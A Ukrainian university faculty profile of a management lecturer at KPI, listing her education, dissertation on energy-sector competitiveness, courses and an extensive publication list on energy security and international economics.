[google-translator]
П’ятниця , 10 Липень 2020
Кафедра менеджменту
КПІ ім. Ігоря Сікорського

Кузнєцова Катерина Олександрівна

 

Освіта: вища, закінчила у 2011 р. Національний технічний університет України «Київський політехнічний інститут», за спеціальністю “Міжнародна економіка”, здобула кваліфікацію економіста. Студенту:
Вчений ступінь к.е.н., у 2014 р. закінчила аспірантуру Національного технічного університету України «Київський політехнічний інститут», у 2016 р. захистила дисертацію на тему: “Ресурсне забезпечення потенціалу конкурентоспроможності енергогенеруючих підприємств” (за спеціальністю 08.00.04 – економіка та управління підприємствами (за видами економічної діяльності). Дергачова В.В., Кузнєцова К.О., Чорній В.В. Ресурсне забезпечення підприємств паливно-енергетичного комплексу України в контексті інтеграції до європейського простору: монографія.

Забезпечення інноваційного розвитку промисловості України: монографія

 

МЕНЕДЖМЕНТ РЕГІОНАЛЬНОГО РОЗВИТКУ: силабус

МЕНЕДЖМЕНТ РЕГІОНАЛЬНОГО РОЗВИТКУ: навчальна програма

МЕНЕДЖМЕНТ РЕГІОНАЛЬНОГО РОЗВИТКУ: метод. рек.до практ. занять

МЕНЕДЖМЕНТ РЕГІОНАЛЬНОГО РОЗВИТКУ: метод. рек. до реферату

МЕНЕДЖМЕНТ РЕГІОНАЛЬНОГО РОЗВИТКУ: конспект лекцій

МЕНЕДЖМЕНТ РЕГІОНАЛЬНОГО РОЗВИТКУ: питання до іспиту

 

БРЕНД-МЕНЕДЖМЕНТ: силабус

PR-МЕНЕДЖМЕНТ: силабус

Вчене звання  –
Наукова діяльність: більше 80 наукових публікацій в межах України та за кордоном (із них 1 стаття у журналі, що індексується в Scopus, 13 у наукових фахових виданнях, участь у 8 колективних монографіях та інші). Стаж педагогічної діяльності – 8 років.

Google Scolar Kuznietsova K.

ORCID Kuznietsova K.

Scopus Author ID Kuznietsova K.

Міжнародна діяльність: учасник міжнародного проекту «European business models: transformation, harmonization and implementation in Ukraine» (№ 587138-EPP-1-2017-1-UA-EPPJMO-MODULE).
Навички: дослідження стану та тенденцій розвитку світової економіки, міжнародної економічної діяльності України; аналіз конкурентоспроможності економічних систем різних рівнів; аналіз та оцінювання фінансово-економічної діяльності суб’єктів господарювання; організація та проведення вступної кампанії на освітній ступінь бакалавра та магістра на факультет менеджменту та маркетингу; ведення діловодства; володіння англійською мовою (рівень В2), французькою мовою.

 

Кузнецова_К_А_менеджмент

Кандидат економічних наук, доцент кафедри менеджменту.

Випускниця факультету менеджменту та маркетингу, кафедри міжнародної економіки НТУУ «КПІ».

2011-2014 рр. – аспірантка кафедри менеджменту ФММ НТУУ «КПІ». Напрям дисертаційного дослідження – ресурсне забезпечення потенціалу конкурентоспроможності енергогенеруючих підприємств.

З 2016 р. – заступник відповідального секретаря відбіркової комісії ФММ з прийому до магістратури.

З 2017 р. – учасник проекту модулю Жана Моне “European business models: transformation, harmonization and implementation in Ukraine”.

Має більше 80 наукових публікацій в межах України та за кордоном (із них 13 у фахових виданнях та участь у 8 колективних монографіях).

Навчальні курси (2018/2019 н.р.): “Менеджмент міжнародної діяльності підприємств”, “Зовнішньоекономічна діяльність підприємства”, “Міжнародні економічні відносини”, “Міжнародне економічне право”, “Управління інтеграційними процесами в ЄС”.

Наукові інтереси: економічна та енергетична безпека, конкурентоспроможність енергетичних підприємств, реформування енергетичного ринку, міжнародна економічна діяльність України, міжнародні економічні відносини, міжнародні інтеграційні процеси.

E-mail: kuznietsova.k@gmail.com


Список публікацій

МОНОГРАФІЇ

 1. Інформаційне забезпечення вирішення еколого-енергетичних проблем сталого розвитку суспільства: монографія. – К.: Тамподек XXI, 2012. – Вип. 1. – 283 с. (Дергачова В.В., Кузнєцова К.О. Нормативно-правова база забезпечення національної енергетичної безпеки).
 2. Економічна безпека держави: міждисциплінарний підхід: монографія / за наук. ред. д.е.н., проф. Хлобистова Є.В. – Черкаси: видавець Чабаненко Ю.А., 2013. – 560 с. (Дергачова В.В., Кузнєцова К.О. Аналіз функціонування ринку електроенергетики України).
 3. Конкурентні домінанти стратегічного розвитку підприємств: монографія. – Черкаси: видавець Чабаненко Ю.А., 2013. – 726 с. (Дергачова В.В., Кузнєцова К.О. 4.1. Теоретичні аспекти конкурентоспроможності підприємства на основі ресурсного потенціалу. 4.2. Сутнісна характеристика ресурсного потенціалу та особливості його формування на підприємстві як базового елементу забезпечення конкурентоспроможності).
 4. Економічна безпека держави: стратегія, енергетика, інформаційні технології : монографія / за наук. ред. д.т.н., проф. Лук’яненко С. О., к.е.н., доц. Караєвої Н. В. – К. : Видавництво ООО «Юрка Любченка», 2014. – 468 с. (Дергачова В.В., Кузнєцова К.О. 2.8. Методична основа оцінювання ресурсного потенціалу підприємств в умовах реформування ринку електроенергії).
 5. Сталий розвиток – ХХІ століття: управління, технології, моделі (наукові читання імені Ігоря Недіна). Дискусії 2015»: колектив. моногр. / НАН України, ДУ «Ін-т ек-ки природокорист. та сталого розвитку НАН України»; НТУУ «КПІ»; Вища ек.-гуманітар. школа; Міжнар. асоціація сталого розвитку / за наук. ред.. проф. Хлобистова Є.В. (Кузнєцова К.О., Дергачова В.В. Оптимізація ресурсного потенціалу енергогенеруючого підприємства в контексті забезпечення сталого розвитку).
 6. Економічна безпека держави і науково-технологічні аспекти її забезпечення»: колектив. моногр. // VІІ наук.-практ. семінару з міжнар. участю ім. проф. І.В. Недіна, 21-22 жовтня 2015 р. (Кузнєцова К.О., Дергачова В.В. Використання мультиплікативної моделі оцінювання конкурентоспроможності енергогенеруючого підприємства на основі ресурсного потенціалу).
 7. Дергачова В.В., Кузнєцова К.О., Чорній В.В. Ресурсне забезпечення підприємств паливно-енергетичного комплексу України в контексті інтеграції до європейського простору: монографія // К.: КПІ ім. Ігоря Сікорського, 2018. [Електронний ресурс]. – Режим доступу: http://ela.kpi.ua/handle/123456789/24573
 8. Забезпечення інноваційного  розвитку промисловості України / Ю. З. Драчук, К. О. Копішинська, Я. О. Колешня, Я. І. Кологривов, К. О. Кузнєцова; за заг. наук. ред. д.е.н., проф. В.В. Дергачової. – К.: КПІ ім. Ігоря Сікорського, 2018. – 234 с. [Електронний ресурс]. – Режим доступу: http://ela.kpi.ua/bitstream/123456789/24575/1/Zabezpechennia_inov_pozv.pdf

 

СТАТТІ У ФАХОВИХ ВИДАННЯХ

 1. Дергачова В.В., Кузнєцова К.О. Інтеграційні пріоритети України в контексті енергетичної безпеки національної економіки // Вісник Донецького нац. ун-ту. Серія В Економіка і право. Спецвипуск. – Т.1., 2011. – Донецьк. – С. 289-293/
 2. Дергачова В.В., Кузнєцова К.О. Тарифна політика як фактор підвищення конкурентоспроможності енергетики України // Економічний вісник НТУУ «КПІ». – К.: НТУУ «КПІ», 2012 (9). – С. 168-173.
 3. Кузнєцова К.О. Теоретичні аспекти формування поняття «ресурсний потенціал» на підприємстві // Вісник Донецького нац. ун-ту. Серія В Економіка і право. Спецвипуск. – Т.2., 2012. – Донецьк. – С.299-302.
 4. Кузнєцова К.О. Конкурентоспроможність підприємства на основі ресурсного потенціалу // Економічний вісник НТУУ «КПІ». – К.: НТУУ «КПІ», 2013 (10). – С. 219-223.
 5. Кузнєцова К.О., Ченуша О.С. Енергетична безпека як основа конкурентоспроможного розвитку енергетичних підприємств // Вісник Донецького нац. ун-ту. Серія В Економіка і право. – Т.2., 2013. – Донецьк. – С. 118-121.
 6. Кузнєцова К.О. Періоди становлення енергетики та особливості функціонування електроенергетичних підприємств // Економічний вісник НТУУ «КПІ». – К.: НТУУ «КПІ», 2014 (14).
 7. Кузнєцова К. О.. Дергачова В.В. Удосконалення мультиплікативної моделі оцінювання конкурентоспроможності енергогенеруючих підприємств / К. О. Кузнєцова, В. В. Дергачова // Економіка. Менеджмент. Бізнес : збір. наук. праць Державного університету телекомунікацій. – К., 2015. – Вип. 2 (12). – С. 71-76.
 8. Кузнєцова К. О. Модель оцінювання конкурентоспроможності енергогенеруючого підприємства на основі ресурсного потенціалу / К. О. Кузнєцова // Стратегія розвитку України (економіка, соціологія, право) : наук. журнал Національного авіаційного університету. – К., 2015. – Вип. 1. – С. 79-85.
 9. Кузнєцова К. О. Економічне обґрунтування оптимізації ресурсного забезпечення потенціалу конкурентоспроможності енергогенеруючих підприємств // Бізнес-Інформ, №11. – 2015.
 10. Кузнєцова К.О., Ченуша О.С. Оптимізація ресурсного забезпечення енергогенеруючих підприємств та їх інноваційний розвиток // Економічний вісник НТУУ «КПІ» : збір. наук. пр. – № 13, 2016 – С. 222-228.
 11. Кузнєцова К.О., Ченуша О.С. Тенденції розвитку підприємств паливно-енергетичного комплексу України // Економічний вісник НТУУ «КПІ» : збір. наук. пр. – № 14, 2017.
 12. Дергачова В.В., Кузнєцова К.О. Державно-приватне партнерство як інституціональний інструмент інвестування економіки країни / В.В. Дергачова, К.О. Кузнєцова // Бізнес Інформ. – Харків: 2018, №1. – С. 111-116. – Режим доступу: http://www.business-inform.net/export_pdf/business-inform-2018-1_0-pages-111_116.pdf
 13. Кузнєцова К.О., Храмцова М.В. Теоретичні засади партнерства та особливості його реалізації на міжнародному ринку // Електронний науково-практичний журнал «Інфраструктура ринку». – Одеса: Причорно-морський  наук.-дослід. ін-т економіки  та інновацій., 2018. – Вип. 22. – ­ С. 116-122. [Електронний ресурс]. – Режим доступу: http://www.market-infr.od.ua/uk/archive
 14. Кузнєцова К.О., Ченуша О.С., Дергачов Є.В. Тенденції розвитку зовнішнього середовища функціонування нафтопереробних підприємств України. Економічний вісник НТУУ «КПІ». №16. 2019.  URL: http://ev.fmm.kpi.ua/issue/view/8632

 

СТАТТІ В ЗАКОРДОННИХ ВИДАННЯХ

 1. Дергачева В.В., Кузнецова Е.А., Нестеренко А.А. Реформирование энергетического рынка для повышения конкурентоспособности экономики Украины // Сбор. науч. трудов 14-й Междунар. науч-практ. конф. Экономика, экология и общество России в 21-м столетии. – СПб: Изд-во Политех. ун-та, 2012. – с. 26-31.
 2. Дергачева В.В., Кузнецова Е.А. Проблемы становления эффективного энергетического рынка Украины // Сбор. науч. трудов 15-й Междунар. науч-практ. конф. Экономика, экология и общество России в 21-м столетии. – СПб: Изд-во Политех. ун-та, 2013. – С.293-298.
 3. Кузнецова Е.А. Развитие альтернативной энергетики как фактор повышения энергетической безопасности // Прогнозирование инно-вационного развития национальной экономики в рамках рационального природопользования»: материалы II междунар. науч.-практ. конф. (13 ноября 2013 г.) / отв. ред. М.Н. Руденко; Перм. гос. нац. исслед. ун-т. – Пермь: 2013. – С. 187-190.
 4. Дергачева В.В., Кузнецова Е.А., Чорней В.В. Инвестиционные стратегии повышения конкурентоспособности энергетического рынка Украины // Международный научный журнал «Устойчивое развитие». – Болгария, 2014.
 5. Дергачева А.М., Дергачева В.В., Дергачев Е.В., Кузнецова Е.А. Устойчивое развитие предприятий в условиях евроинтеграции // Международный журнал «Устойчивое развитие», Болгария, 2018.

СТАТТІ В ІНШИХ ВИДАННЯХ

 1. Дергачова В.В., Кузнецова Е.А. Экономическая интеграция в контексте энергетической безопасности национальной экономики // Науково-практичний журнал Проблеми інноваційно-інвестиційного розвитку. – №3. – К.: КНУ ім. Т. Шевченко, 2011. – С. 69-79.
 2. Дергачова В.В., Кузнєцова К.О. Теоретико-методичні засади формування енергетичної безпеки України // Праці III наук.-практ. семінару з міжнар. участю. Економічна безпека держави і науково-технологічні аспекти її забезпечення (Недінські читання). 20-21 жовтня 2011 р.. – Черкаси: видавець Чабаненко Ю.А., 2011. – С. 155-165.
 3. Кузнєцова К.О. Модель залучення іноземних інвестицій в енергетику України // Збір. наук. праць Міжнародна економіка: інтеграція науки та практики. – К.: НТУУ «КПІ», 2011. – С. 89-95.
 4. Кузнєцова К.О., Лисенко А.В. Перехід до спрощеної системи оподаткування в Україні // Збір. Наук. праць III Всеукр. наук.-практ. конф. Сучасні підходи до управління підприємством, 15 березня 2012 р. – К.: НТУУ «КПІ», 2012. – С. 275-280.
 5. Дергачова В.В., Кузнєцова К.О. Енергетична безпека реального сектору національної економіки в міжнародних співставленнях // Праці IV міжнар. наук.-практ. семінару. Економічна безпека держави і науково-технологічні аспекти її забезпечення. 23-26 жовтня 2012 р. / відпов. ред. Є.М. Письменний, В.М. Шаповал. – Дніпропетровськ: Національний гірничий ун-т, 2012. – С.49-53.
 6. Кузнєцова К.О. Методичні основи оцінки енергетичної безпеки // Збір. наук. праць Міжнародна економіка: інтеграція науки та практики. – К.: ВП «Едельвейс», 2012. – с. 131-136.
 7. Кузнєцова К.О. Фактори впливу на формування конкурентоспроможності підприємства // Збір. наук. праць Актуальні проблеми економіки. – К.: НТУУ «КПІ», 2013 (електронний ресурс).
 8. Кузнєцова К.О., Ситник Т.В. Інформаційні технології як засіб підвищення ефективності управління підприємством // Збір. Наук. праць IV Всеукр. наук.-практ. конф. Сучасні підходи до управління підприємством, 11 квітня 2013 р. – К.: НТУУ «КПІ», 2013. – Т.1. – С. 107-112.
 9. Кузнєцова К.О., Лисенко А.В. Формування інноваційної інфраструктури в Україні для підвищення конкурентоспроможності національної економіки // Збір. Наук. праць IV Всеукр. наук.-практ. конф. Сучасні підходи до управління підприємством, 11 квітня 2013 р. – К.: НТУУ «КПІ», 2013. – Т.2. – С. 35-40.
 10. Кузнєцова К.О. Відновлювальні джерела енергії у забезпеченні енергетичної безпеки України // Збір. наук. праць Міжнародна економіка: інтеграція науки та практики. – К.: НТУУ «КПІ», 2013. – С.100-105.
 11. Кузнєцова К.О. Проблеми ціноутворення на ринку електроенергетики України // Збірник наук. праць Хмельницького кооперативного торговельно-економічного інституту, серія «Економічні науки». – Хмельницький: №6, 2013. – С. 235-240.
 12. Кузнєцова К.О. Передумови та перспективи розвитку енергетичного ринку України // Збір. наук. праць Актуальні проблеми економіки. – К.: НТУУ «КПІ», 2014 (електронний ресурс).
 13. Кузнєцова К.О., Лисенко А.В. GR-діяльність як інструмент затвердження інституту публічно-правового партнерства в Україні // Збір. Наук. праць V Всеукр. наук.-практ. конф. з міжнародною участю «Сучасні підходи до управління підприємством», 24 квітня 2014 р. – Черкаси: видавець Чабаненко Ю.А., 2014. – С. 139-143.
 14. Кузнєцова К.О., Таланцев Б.Б. Розробка родовищ сланцевого газу як інструмент підвищення енергетичної безпеки України // Збір. Наук. праць V Всеукр. наук.-практ. конф. з міжнародною участю «Сучасні підло-ди до управління підприємством», 24 квітня 2014 р. – Черкаси.: видавець Чабаненко Ю.А., 2014. – С. 490-494.
 15. Kuznietsova K.O. Preconditions and perspectives of Ukrainian energy market development // Economic Processes Management. – 2014. – № 1. – [Internet source]. – Access mode:http://epm.fem.sumdu.edu.ua/download/2014_1/2014_1_5.pdf
 16. Кузнєцова К.О., Ченуша О.С. Аналіз факторів зовнішнього середовища енергетичного підприємства // Збір. наук. праць VI Всеукр. наук.-пр. конф. з міжнародною участю «Сучасні підходи до управління підпри-ємством», 23 квітня 2015 р. – Черкаси: видавець Чабаненко Ю.А., 2015. – 544 с. (С. 399-405).
 17. Душенька І.І., Кузнєцова К.О. Ринок целюлозно-паперової промисловості: сучасний стан та перспективи розвитку // Сучасні підходи до управління підприємством: зб. наук. праць. – К.: КПІ ім. Ігоря Сікорського, 2018. – №3. [Електронний ресурс]. – Режим доступу: http://spu.fmm.kpi.ua/article/view/142567/140033
 18. Кузнєцова К.О., Мацько Н.М. Прoблеми oргaнiзaцiйнo-екoнoмiчнoгo зaбезпечення зoвнiшньoекoнoмiчнoї дiяльнocтi вiтчизняниx вирoбникiв медичнoгo oблaднaння (нa приклaдi ТOВ «Пoлiпрoмcинтез») // Збiрник нaукoвиx прaць Xмельницькoгo кooперaтивнoгo тoргoвельнo-екoнoмiчнoгo iнcтитуту «Екoнoмiчнi нaуки», – Хмельницький, 2018. – №12 – 378 с. (С. 49-60).
 19. Дудик А.В., Кузнєцова К.О. Міжнародне інвестиційне забезпечення сільськогосподарського виробництва України // Збiрник нaукoвиx прaць Xмельницькoгo кooперaтивнoгo тoргoвельнo-екoнoмiчнoгo iнcтитуту «Екoнoмiчнi нaуки», – Хмельницький, 2018. – №12 – 378 с. (С. 37-48).
 20. Душенька І.І., Кузнєцова К.О. Перспективи ринку публічних закупівель європейського союзу у контексті виходу підприємства на нові ринки збуту // Актуальні проблеми економіки та управління: зб. наук. пр. молодих вчених. – №12, 2018. Режим доступу: http://ape.fmm.kpi.ua/article/view/130963/126691
 21. Victoria Dergachova, Maryna Kravchenko, Katheryna Kuznietsova, Anna Dergachova, Valeriia Melnykova СИСТЕМНИЙ АНАЛІЗ УПРАВЛІННЯ ЕКОНОМІЧНОЮ СТІЙКОСТЮ ПІДПРИЄМСТВ В УМОВАХ РИЗИКОВАНОСТІ // Міжнародний науково-теоретичний журнал “Problems and Perspectives in Management” / «Systemic-structural analysis of the machine-building enterprises economic sustainability formation mechanism» // Volume 17 2019, Issue #3, pp. 395-409  http://dx.doi.org/10.21511/ppm.17(3).2019.32

ТЕЗИ ДОПОВІДЕЙ

 1. Кузнєцова К.О. Розвиток вітроенергетики в Україні: переваги і недоліки // Матеріали VII Міжнар. наук.-практ. конф. Розвиток підприємництва як фактор росту національної економіки, 26 листопада 2008 р.: тези доповідей – Київ: ІВЦ Вид-во «Політехніка», 2008. – С. 210-211.
 2. Кузнєцова К.О. Лізинг як дієвий фінансовий інструмент технічного переозброєння економіки України // Матеріали VIII Міжнар. наук.-практ. конф. Розвиток підприємництва як фактор росту національної економіки, Київ, 25 листопада 2009 р.: тези доповідей – Київ: ІВЦ Вид-во «Політехніка», 2009. – С. 191.
 3. Кузнєцова К.О. Розвиток вітроенергетики як напрям підвищення енергетичної безпеки України // Матеріали V (XVII) Всеукр. наук.-практ. конф. Міжнародне науково-технічне співробітництво, Київ, 12-13 березня 2009 р.: тези доповідей. – НТУУ «КПІ». – С. 202.
 4. Кузнєцова К.О. ІРО як сучасний дієвий метод залучення інвестицій в економіку України // Матеріали VI (XVIII) Всеукр. наук.-практ. конф. Міжнародне науково-технічне співробітництво, Київ, 11-12 березня 2010 р.: тези доповідей. – К.: НТУУ «КПІ», 2010. – С. 291.
 5. Кузнєцова К.О. Аналіз міжнародної конкурентоспроможності олійної галузі України // Матеріали наук.-практ. конф. студ., аспіран. і молод. вчен. В2В маркетинг, Київ, 18-20 лютого 2010 р.: тези доповідей. – К.: Вид-во «Хімджест», 2010. – С. 171-172.
 6. Кузнєцова К.О. Інвестування енергетики України // Матеріали VI Всеукр. наук.-практ. інтернет-конф. Наука і життя: українські тенденції, інтеграція у світову наукову думку, Київ, 18-20 травня 2010 р.: тези доповідей. – Ін-т наук. прогноз., 2010. – С. 59.
 7. Кузнєцова К.О. Система державного регулювання ринку цінних паперів в Україні // Матеріали VI Всеукр. наук.-практ. інтернет-конф. Соціум. Наука. Культура, ч.1, Київ, 26-28 січня 2010 р.: тези доповідей. – К.: Ін-т наук. прогноз., Крим. ін.-тек-ки та господар. права, 2010. – С. 57-58.
 8. Кузнєцова К.О. Загальні засади регулювання міжнародних фондових ринків // Матеріали VI Всеукр. наук.-практ. інтернет-конф. Сучасна наука в мережі інтернет, Київ, 25-27 лютого 2010 р.: тези доповідей. – К.: Ін-т наук. прогноз., Крим. ін.-т ек-ки та господар. права, 2010. – С. 48-50.
 9. Кузнєцова К.О. Гармонізація національного бухгалтерського обліку України та міжнародних стандартів // Матеріали VI Міжнар. наук.-практ. конф. молод. вчен. Економічний і соціальний розвиток України в XXI столітті: національна ідентичність та тенденції глобалізації, ч.1, Тернопіль, 25-26 лютого 2010 р.: тези доповідей. –Т.: Вид-во ТНЕУ «Економічна думка», 2010. – С. 348-349.
 10. Кузнєцова К.О. Інтелектуальний капітал як фактор розвитку сучасної економіки // Матеріали II Міжнар. наук.-практ. конф. Стратегії інноваційного розвитку економіки: бізнес, наука, освіта, Харків, 7-10 квітня 2010 р.: тези доповідей. – Х.: НТУ «ХПІ», 2010. – С. 456-458.
 11. Кузнєцова К.О. Аналіз стану та шляхи підвищення енергетичної безпеки України // Матеріали V(XVII) Всеукр. наук.-практ. конф., Київ, 10-11 березня 2011 р.: тези доповідей. – НТУУ «КПІ», 2011. – с. 248.
 12. Кузнєцова К.О. Розробка власного видобутку енергоресурсів як шлях підвищення конкурентоспроможності енергетики України // Матеріали VIII Всеукр. наук.-практ. конф., Київ, 15-16 березня 2012 р.: тези доповідей. – НТУУ «КПІ», 2012. – С. 154.
 13. Кузнєцова К.О. Теоретичні підходи до формування потенціалу енергетичних підприємств // Матеріали Міжнар. наук.-практ. конф. Тео-рія та практика управління економічним розвитком, Київ, 22-24 листопада 2012 р.: тези доповідей. – Т. 1. – Донецьк: ООО «Фирма «Друк-Инфо», 2012. – С. 244-246.
 14. Кузнєцова К.О. Відмінності поняття «потенціал» та «ресурси» підприємства // Матеріали ХI Міжнар. наук.-практ. конф. Розвиток підприємництва як фактор росту національної економіки, 21 листопада 2012 р.: тези доповідей – Київ: ІВЦ Вид-во «Політехніка», 2012. – С. 72.
 15. Кузнєцова К.О. Енергетична складова економічної безпеки України // Матеріали ХІІ Міжнар. наук.-практ. конф. студентів, аспірантів і молодих вчених «Науково-технічний розвиток: економіка, технологгії, управління», 2-5 квітня 2013 р. – К.: НТУУ «КПІ», 2013. – С. 105.
 16. Дергачова В.В., Кузнєцова К.О. Можливості інноваційного розвитку ринку електроенергетики України // Збірник тез доповідей VII Міжнар. наук.-практ. конф. «Маркетинг інновацій і інновації в маркетингу», 26-28 вересня 2013 р. – Суми: ТОВ «Папірус», 2013. – С. 60-62.
 17. Кузнєцова К.О. Модель функціонування електроенергетичного ринку України // Збірник матеріалів ІХ Міжнар. наук.-практ. конф. «Сучасні проблеми менеджменту», 25 жовтня 2013 р. – К.: НАУ, 2013. – С. 82-83.
 18. Кузнєцова К.О. Конкурентоспроможність зовнішньоекономічної діяльності підприємств енергетичної галузі національної економіки // Матеріали ХII Міжнар. наук.-практ. конф. Розвиток підприємництва як фактор росту національної економіки, 20 листопада 2013 р.: тези доповідей. – К.: ІВЦ Вид-во «Політехніка», 2013. – С. 180.
 19. Кузнєцова К.О. Сутність енергетичної безпеки енергетичних підприємств // Матеріали X (XXII) міжнар. наук.-практ. конф. «Міжнародне науково-технічне співробітництво: принципи, механізми, ефективність», 13-14 березня 2014 р.: тези доповідей. – К.: Вид-во «Політехніка», НТУУ «КПІ», 2014. – С. 109.
 20. Кузнєцова К.О. Реформування моделі ринку електроенергії в Україні // Матеріали XIII Міжнар. наук.-пр. конф. «Науково-технічний розвиток: економіка, технології, управління», 9-11 квітня 2014 р. – К.: НТУУ «КПІ», 2014. – С.77.
 21. Кузнєцова К.О. Перспективи реформування ринку електроенергії України // Матеріали ХIII Міжнар. наук.-практ. конф. Роз-виток підприємництва як фактор росту націо-нальної економіки, 26 листопада 2014 р.: тези доповідей. – К.: ІВЦ Вид-во «Політехніка», 2014.
 22. Кузнєцова К.О. Диверсифікація джерел постачання газу як пріоритетний напрям розвитку ГТС України // Матеріали XI (XXІII) міжнар. наук.-пр. конф. «Міжнародне науково-технічне співробітництво: принципи, механізми, ефективність», м. Київ, 9-10 квітня 2015 р. – К.: НТУУ «КПІ», 2015, С. 123.
 23. Кузнєцова К.О. Зарубіжний досвід формування моделей організації ринку електроенергії країни // Метеріали XVI Міжнар. наук.-пр. конф. «Нау-ково-технічний розвиток: економіка, техно-логії, управління», 9-11 квітня 2015 р. – К.: НТУУ «КПІ», 2015. – С.180-181.
 24. Кузнєцова К.О. Роль ефективного використання потенціалу газотранспортної системи для національної економіки України // Розвиток підприємництва як фактор розвитку національної економіки: матеріали ХІV міжнар наук.-прак. конф. 25 листопада 2015 р. – К.: ІВЦ «Політехніка», 2015. – 232 с.
 25. Кузнєцова К.О., Дергачова В.В. Системний підхід до формування ресурсного забезпечення енергогенеруючого підприємства // IV Міжнародна  науково-практична  конференція «Сучасні виклики розвитку світової економіки» «MCGE’2015» 19 – 20 листопада 2015 року.
 26. Кузнєцова К.О. Теоретичні основи ресурсного забезпечення потенціалу конкурентоспроможності енергогенеруючого підприємства // VІІ всеукраїнська  Науково-практична конференція «Сучасні підходи до управління підприємством» з міжнародною участю, 28 квітня 2016 р.
 27. Кузнєцова К.О. Передумови інтеграції України в сучасну світо господарську систему // Розвиток підприємництва як фактор росту національної економіки: Матеріали XV міжнар. наук.-пр. конф. 16 листопада 2016 р. – К.: ІВЦ Вид-во «Політехніка», 2016 – 264 с. (С. 79).
 28. Кузнєцова К.О., Ченуша О.С. Система економічної безпеки підприємств ПЕК // Актуальні проблеми управління та економічного розвитку в умовах інформатизації суспільства: Матеріали наук.-пр. конф. (м. Київ, 20 грудня 2016 р.) К.: ДУТ, Навч.-наук. ін.-т менеджменту та підприємництва, 2016. – 170 с. (С.55-56).
 29. Кузнєцова К.О. Стан та тенденції розвитку енергогенеруючих підприємств України // Сучасні тенденції та перспективи розвитку системи управління в Україні та світі: Матеріали міжн. науково-пр. конф. (м. Київ, 16-17 березня 2017 р.): Державний університет телекомунікацій, Навчально-науковий інститут менеджменту та підприємництва, 2017. – 257 с. (С. 67-68).
 30. Кузнєцова К.О., Ченуша О.С. Система економічної безпеки підприємств паливно-енергетичного комплексу // Міжнародне науково-технічне співробітництво: принципи, механізми, ефективність: збірник праць ХІІІ (ХХV) Всеукр. наук.-пр. конф., Київ, 16-17 березня 2017 р.. – К.: КПІ ім.. Ігоря Сікорського, Вид-во «Політехніка», 2017. – 136 с. (С. 107).
 31. Кузнєцова К.О. Напрями вдосконалення політики ресурсозбереження на енергогенеруючих підприємствах України // Сучасні підходи до управління підприємством: зб. тез доп. VIII Всеукр. наук.-пр. конф., 6 квіт. 2017 р. – Київ: КПІ ім.. Ігоря Сікорського, Вид-во «Політехніка», 2017. – 112 с. (С. 74).
 32. Кузнецова Е.А. Повышение энергоэффективности работы предприятий топливно-энергетического комплекса // Экономика, экология и общество России в 21-м столетии: сборник научных трудов 19-й Международной научно-практической конференции. 15-16 мая 2017 года / под. ред. Н.И. Диденко. – СПб.: Изд-во Политехн. ун-та, 2017. – 564 с. (С. 444-447).
 33. Дергачова В.В, Кузнєцова К.О., Ченуша О.С. Управління економічною безпекою підприємств ПЕК на основі компетентнісного підходу // Сталий розвиток — ХХІ століття: управ-ління, технології, моделі. Дискусії 2017: колек. моногр. / Ін-т телекомунікацій̆ та глобального інформа-ційного простору НАН України; КПІ ім. Ігоря Сікорського; Вища економіко-гуманітарна школа / за наук. ред. проф. Хлобистова Є.В. – К.: 2017. – 564 с. (С.48-53).
 34. Кузнєцова К.О. Причини виникнення та етапи становлення європейської економічної інтеграції // International Scientific Conference Anti-Crisis Management: State, Region, Enterprise: Conference Proceedings, Part II, November 17th, 2017. Le Mans, France: Baltija Publishing. 172 pages (С. 66-68).
 35. Kuznietsova K., Manayenko I. Resource support of ukranian enterprises’ development of fuel and energy complex in context of european integration // V Ogolnopolska Konferencja Plakatowa Markeninr I Zarzadzanie, 7 grudnia 2017. – Katedre Podstaw Marketingu Uniwersytetu Ekonomicznego we Wrociawiu.
 36. Дергачова В.В., Кузнєцова К.О. Економічна безпека України в контексті євроінтеграції // Збірник тез доповідей VII Міжнар. наук.-практ. конф. «Актуальні питання забезпечення стійкого розвитку національного господарства», 24-25 листопада 2017 р. – Кременчук: ФОП Є.Л. Жуков, 2018 – 276 с. (С.30-31).
 37. Кузнєцова К.О. Економічне становище України в умовах циклічності розвитку світового господарства // Міжнародне науково-технічне співробітництво: принципи, механізми, ефективність: збірник праць ХІV (ХХVI) Всеукр. наук.-пр. конф., Київ, 15-16 березня 2018 р.. – К.: КПІ ім.. Ігоря Сікорського, Вид-во «Політехніка», 2018. – 108 с. (С. 13).
 38. Душенька І.І., Кузнєцова К.О. Ринок целюлозно-паперової промисловості: сучасний стан та перспективи розвитку // Сучасні підходи до управління підприємством: зб. тез доп. ІХ Всеукр. наук.-прак. конф., 12 квіт. 2018 р. – К.: КПІ ім. Ігоря Сікорського, Вид-во «Політехніка», 2018. – 160 с. (С.108).
 39. Кузнєцова К.О., Храмцова М.В. Застосування інтернет-сервісів для вдосконалення міжнародної діяльності підприємства // Сучасні підходи до управління підприємством: зб. тез доп. ІХ Всеукр. наук.-прак. конф., 12 квіт. 2018 р. – К.: КПІ ім. Ігоря Сікорського, Вид-во «Політехніка», 2018. – 160 с. (С.588).
 40. Кузнєцова К.О. Состояние экономического потенциала Украины // Материали за XIV международна научна практична конференция, Научният потенциал на света – 2018, 15 – 22 септември 2018 г.: София.« Бял ГРАД-БГ » – 100 c. – С.3-5.
 41. Кузнєцова К.О., Храмцова М.В. Критерії відбору підприємств для міжнародного партнерства // Актуальні питання економіки, фінансів, обліку та права в сучасних умовах: збірник тез доповідей міжнародної науково-практичної конференції (Полтава, 10 вересня 2018 р.): у 3 ч. – Полтава: ЦФЕНД, 2018. – Ч. 3. – с. 45-47.
 42. Кузнєцова К.О., Ченуша О.С. Створення мінімальних запасів нафти та нафтопродуктів як інструмент забезпечення економічної безпеки нафтопереробних підприємств України. Сучасні підходи до управління підприємством: зб. тез доп. X Всеукр. наук.-практ. конф., 25 квіт. 2018 р. Київ: КПІ ім. Ігоря Сікорського. Вид-во «Політехніка». 2019.

НАУКОВО-МЕТОДИЧНІ ВИДАННЯ

 1.  Міжнародні економічні відносини: методичні вказівки до самостійної роботи студентів галузі знань 0306, напряму підготовки 6.030601 «Менеджмент» професійного спрямування «Менеджмент організацій і адміністрування», «Менеджмент зовнішньоекономічної діяльності», «Менеджмент інноваційної діяльності» / Уклад.: В.В. Дергачова, І.М. Манаєнко, К.О. Кузнєцова. – К.: НТУУ «КПІ», 2014.
